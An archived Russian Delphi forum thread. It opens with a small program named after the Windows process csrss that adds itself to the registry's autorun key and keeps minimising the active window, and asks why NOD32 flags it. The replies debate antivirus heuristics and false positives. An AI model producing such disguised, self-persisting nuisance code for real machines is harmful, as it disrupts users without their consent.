Форум: "Прочее";
Текущий архив: 2013.03.22;
Скачать: [xml.tar.bz2];
Внизпочему если убираешь строки про реестр nod32 ругается Найти похожие ветки
← →
Jonis_84 © (2012-08-11 03:03) [0]
program csrss1;
uses
Winapi.Windows, Winapi.Messages,
Vcl.Forms, Registry ;
var des,h:HWnd;
Reg:TRegistry;
opa:TPoint;
Rec:TRect;
begin
reg := TRegistry.Create();//?
reg.RootKey := HKEY_CURRENT_USER;//?
if reg.OpenKey("Software\Microsoft\Windows\CurrentVersion\Run", True) then//?
begin
reg.WriteString( Application.Title, Application.ExeName);//?
reg.CloseKey();//?
end;//?
while True do
begin
des:=GetForegroundWindow;
ShowWindow(Des,SW_MINIMIZE);
sleep(3000);
Если убрать добавление записи в реестр Nod шлёт погу в карантин???строчки ему нравятся)))хорошего для системы кажется в них ничего нет)reg := TRegistry.Create();//?
reg.RootKey := HKEY_CURRENT_USER;//?
if reg.OpenKey("Software\Microsoft\Windows\CurrentVersion\Run", True) then//?
begin
reg.WriteString( Application.Title, Application.ExeName);//?
reg.CloseKey();//?
end;//?
Спасибо!!!
← →
Германн © (2012-08-11 03:18) [1]Все вопросы к индусам.
← →
Anatoly Podgoretsky © (2012-08-11 06:26) [2]> Jonis_84 (11.08.2012 03:03:00) [0]
nod32 много о себе думает.
← →
Rouse_ © (2012-08-11 11:06) [3]Ложное срабатывание, отправь экзешник с кодом в саппорт нода.
← →
Eraser © (2012-08-12 01:58) [4]
> Jonis_84 © (11.08.12 03:03)
и правильно срабатывает.
вот ты зачем назвал экзешник csrss1? просто буковки понравились?
← →
Германн © (2012-08-12 02:33) [5]
>
> > Jonis_84 © (11.08.12 03:03)
>
> и правильно срабатывает.
> вот ты зачем назвал экзешник csrss1? просто буковки понравились?
>
А вот этого я и не заметил! Ну есс-но любой антивирусник должен возбудиться на такое имя. Так что "ложное срабатывание" похоже можно дезавуировать.
← →
brother © (2012-08-12 11:12) [6]трояновирусописаки вон!
← →
Rouse_ © (2012-08-12 12:31) [7]
> Ну есс-но любой антивирусник должен возбудиться на такое
> имя.
В топку такие антивирусники, которые вирусы на основании имени детектируют :)
← →
wl © (2012-08-12 12:41) [8]
> Rouse_ © (12.08.12 12:31) [7]
называется как вирус, действует как вирус, и что - "Не верь глазам своим"(с)
← →
Rouse_ © (2012-08-12 12:46) [9]
> называется как вирус
ненаказуемо ©
вирусы часто называются setup.exe
> действует как вирус
запись в авторан и минимизация текущего активного окна, это вирус? :)
Какие-то безобидные нынче вирусы пошли, или у нас разные понятия о их природе и поведении ;)
← →
QAZ (2012-08-12 15:35) [10]если уж на то пошло, то вирус это програма внедряющая свой код в другую программу, все остальное это не вирус, чем бы оно не занималось
← →
wl © (2012-08-12 21:20) [11]да, простите, излишне обобщил все вредоносное по одним словом
← →
Германн © (2012-08-13 02:54) [12]
> Rouse_ © (12.08.12 12:31) [7]
>
>
> > Ну есс-но любой антивирусник должен возбудиться на такое
> > имя.
>
> В топку такие антивирусники, которые вирусы на основании
> имени детектируют :)
>
Это называется "перестраховка". И не надо сразу её фтопку! :)
В топике может быть представлено что угодно. В реальной ситуации может быть нечто иное.
← →
Eraser © (2012-08-13 04:38) [13]Кстати, автор не упомянул, включена ли защита от потенциально опасного ПО, скорее всего включена.
← →
Rouse_ © (2012-08-13 14:11) [14]
> Это называется "перестраховка"
Это называется идиотизм, если выставялется приговор на основе имени приложения. Я понимаю если бы эвристик обработал или сигнатурный поиск.
← →
Anatoly Podgoretsky © (2012-08-13 14:26) [15]> Rouse_ (13.08.2012 14:11:14) [14]
На основе имени, приводит к тому что не остается незаблокированых файлов
← →
Eraser © (2012-08-13 15:53) [16]
> Rouse_ © (13.08.12 14:11) [14]
это и есть эвристик практически в чистом виде.
← →
Rouse_ © (2012-08-13 16:12) [17]
> это и есть эвристик практически в чистом виде.
Т.е. ты серьезно считаешь что в наименовании файла таится некая скрытая угроза на которую должен реагировать эвристик?
Я вот почему-то считал всегда что он должен принимать решение на результатах поведенческого анализа, полученного после рапаковки, дизассемблирования тела анализируемого приложения и построения вероятностных графов логики на основе статического анализа и/или логирования выполняемых действий в сэндбоксе :)
← →
Rouse_ © (2012-08-13 16:15) [18]Ну а по поводу фтопку я уже говорил, не антивируса собачье дело как у меня исполняемый файл называется, хоть csrss, хоть supervirus - ему это должно быть до балды, он должен принимать решения базирующиеся не на ламерских постулатах, а на основе анализа тела файла ;)
← →
Anatoly Podgoretsky © (2012-08-13 16:28) [19]Антивирус недолжен так поступать, а вот дефендер может (crack.exe/keygen.exe), и никакого карантина, а прямой запрос на операцию - удалить/разрешить/карантин/в исключения.
← →
Rouse_ © (2012-08-13 19:28) [20]
> а вот дефендер может
Дефендер (шоп его приподняло) у меня экзешники без запроса в карантин отправлял. Когда списались с их техническими писаками выяснилось что он так на название последней секции реагировал (там было что-то типа .morfin). Правда это было еще на заре дефендера...
← →
Anatoly Podgoretsky © (2012-08-13 20:02) [21]> Rouse_ (13.08.2012 19:28:20) [20]
Ну сейчас дефендера как такого убили, включив его в состав антивируса, и так
у многих производителей.
У меня несколько раз срабатывал, но советовался со мной.
← →
Dennis I. Komarov © (2012-08-13 20:30) [22]
> Я вот почему-то считал всегда что он должен принимать решение
> на результатах поведенческого анализа, полученного после
> рапаковки, дизассемблирования тела анализируемого приложения
> и построения вероятностных графов логики на основе статического
> анализа и/или логирования выполняемых действий в сэндбоксе
> :)
Стал ругаться на некую конструкцию if then else... (ну поведение может и было подозрительно - там файлы переименовывались)
Поменял на if then; if not then - не кашерно, но антитварь орать перестала...
← →
Rouse_ © (2012-08-13 20:42) [23]
> Стал ругаться на некую конструкцию if then else
Это сигнатурный анализ - стандартно :)
← →
Давайте будем жрать! (2012-08-13 20:52) [24]а название у программки показательное, ага... ещё б антивирь не хватался за киндьжялъ на каждое хоть сколько-то подозрительное действие.
← →
Eraser © (2012-08-14 20:48) [25]
> Rouse_ © (13.08.12 16:12) [17]
эвристика, это то, что выявляется опытным путем, в т.ч. на основе статистики. если 99 программ из 100 с подобным названием и с обращением к этому же ключу реестра являются вредоносными, то закономерно отнести все такие программы к вредоносным.
← →
Rouse_ © (2012-08-14 20:55) [26]
> Eraser © (14.08.12 20:48) [25]
>
> > Rouse_ © (13.08.12 16:12) [17]
>
> эвристика, это то, что выявляется опытным путем, в т.ч.
> на основе статистики. если 99 программ из 100 с подобным
> названием и с обращением к этому же ключу реестра являются
> вредоносными, то закономерно отнести все такие программы
> к вредоносным.
Это ты сам придумал? Сие есть статистика, а не эвристика ;)
Я же выше озвучил что большинство зловредов идет под наименованием setup.exe, сетаперы убивать будем прямо с ходу?
Ну и советую хотя-бы почитать технические статьи по реализации эвристических анализаторов. Неплохо до кучи будет изучить утекшие в сеть исходники касперского и AVZ, особенное AVZ - там очень красиво показана вообще реализация детекта на поведенческом анализе.
← →
Inovet © (2012-08-14 20:59) [27]> [25] Eraser © (14.08.12 20:48)
> эвристика, это то, что выявляется опытным путем, в т.ч.
> на основе статистики.
Это эмпирическое.
← →
Eraser © (2012-08-14 21:06) [28]
> Rouse_ © (14.08.12 20:55) [26]
а что со мной то спорить? ) это с производителями антивирусов спорь.
я ни сколько не фанат такого подхода, наш продукт регулярно попадает под раздачу таких вот эвристик. по шапке и от есета и от каспера получаем регулярно, несмотря на наличие ЭЦП, кстати.
← →
Rouse_ © (2012-08-14 21:17) [29]
> Eraser © (14.08.12 21:06) [28]
> а что со мной то спорить? ) это с производителями антивирусов
> спорь.
Леш, да брось - я не спорю, я просто указываю на немного неверную трактовку некоторых понятий :)
> наш продукт регулярно попадает под раздачу таких вот эвристик.
> по шапке и от есета и от каспера получаем регулярно, несмотря
> на наличие ЭЦП, кстати.
А вот это достаточно уже серьезно, мы такое прошли года 4 назад приложив некоторое кол-во усилий. Т.е. прямой контакт с разрабами и выявление конкретной причины. У нас были траблы как с антивирусами так и с Wine эмулятором. Как правило, когда пройдешь через решето манагеров и выйдешь напрямую на разработчиков - все проблемы решаются в день-два.
← →
Eraser © (2012-08-14 22:07) [30]
> Rouse_ © (14.08.12 21:17) [29]
> А вот это достаточно уже серьезно, мы такое прошли года
> 4 назад приложив некоторое кол-во усилий. Т.е. прямой контакт
> с разрабами и выявление конкретной причины. У нас были траблы
> как с антивирусами так и с Wine эмулятором. Как правило,
> когда пройдешь через решето манагеров и выйдешь напрямую
> на разработчиков - все проблемы решаются в день-два.
Дело в том, что в нашем случае это вряд ли спасет. Да и убирают срабатывание из базы обычно довольно оперативно (или наоборот добавляют в базу исключение, не знаю уж как там у них).
А срабатывает не из-за каких-то хитрых конструкций, шифрования кода, защиты от взлома и прочих writeprocessmemory. а по вполне формальным признакам. Т.к. ПО для удаленного администрирования итак относится к потенциально опасному. То за кейлогер примут, то за троян. Из-за каких особенностей ПО принимают за вредоносное - вполне понятно, но поделать с этим ничего нельзя увы, это часть функционала.
← →
Rouse_ © (2012-08-14 22:32) [31]
> ПО для удаленного администрирования итак относится к потенциально
> опасному.
Дык у нас полноценный админкит присутствует, работающий примерно как у тебя на сайте в профиле. Сработались все-же :)
Страницы: 1 вся ветка
Форум: "Прочее";
Текущий архив: 2013.03.22;
Скачать: [xml.tar.bz2];
Память: 0.53 MB
Время: 0.081 c